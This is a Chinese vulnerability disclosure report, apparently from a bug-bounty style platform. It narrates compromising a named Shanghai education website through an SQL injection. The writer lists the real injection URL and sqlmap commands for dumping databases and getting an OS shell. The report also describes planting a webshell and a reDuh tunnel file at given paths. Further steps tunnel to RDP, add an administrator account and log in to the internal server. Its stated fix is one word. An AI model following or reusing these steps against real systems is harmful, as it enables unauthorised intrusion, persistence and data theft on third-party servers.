漏洞详情

披露状态:

2014-09-27: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-11: 细节向公众公开

简要描述:

仅仅一个SQL注入导致服务器沦陷,下面让我来叙述一下是如何渗透进去的。

详细说明:

网址:http://shy.hpe.sh.cn
一个sql注入导致的服务器沦陷。
一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)
没事溜达到这个网址:(注入点)
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169
首先是暴库(16个数据库吧):
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

dbs.png


DBA权限:

dba.png


管理员:

man.png


脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。
下面说重点了。os-shell
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

os-shell.png


比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。
果断换了种方式写了个一句话:

pango.png


之前报错信息已经暴漏了网站的物理地址,马的物理位置:
d:mainwebParentSchoolCNjxhdimport.aspx
直接上服务器:

getinfo.png


至此,已经拥有了这台服务器的shell了。
上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。
到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。
得到的公网IP信息:
Nmap scan report for 210.22.116.91
Host is up (0.011s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
就开了个80端口。
在菜刀里ipconfig下看到的是:
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10
IPv4 地址 . . . . . . . . . . . . : 10.11.124.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.11.124.1
原来是这样的:
公网ip地址:210.22.116.91 这个只开了80端口
内网ip地址:10.11.124.5
要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?
上面的上传的那个getinfo.aspx文件的作用来了。
这里reDuh隧道穿透了:
java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx
给大家弄个截图,大致会出现下面界面:

1.png


打开本地1010端口,使用telnet或者nc连接本地的1010端口:

2.png


创建隧道:[createTunnel]1234:127.0.0.1:3389
nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定

3.png


ok,基本工作均已完成。下面在用菜刀添加个用户:

demo.png


密码就不显示了。
提升权限至administrators组
好了,这就全部完成了:
mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:

rdp.png


这样就想操作你自己的电脑一样了,想干什么就干什么。

漏洞证明:

如上。
一句话:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx
RDP隧道:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx

修复方案:

过滤

标签: none

评论已关闭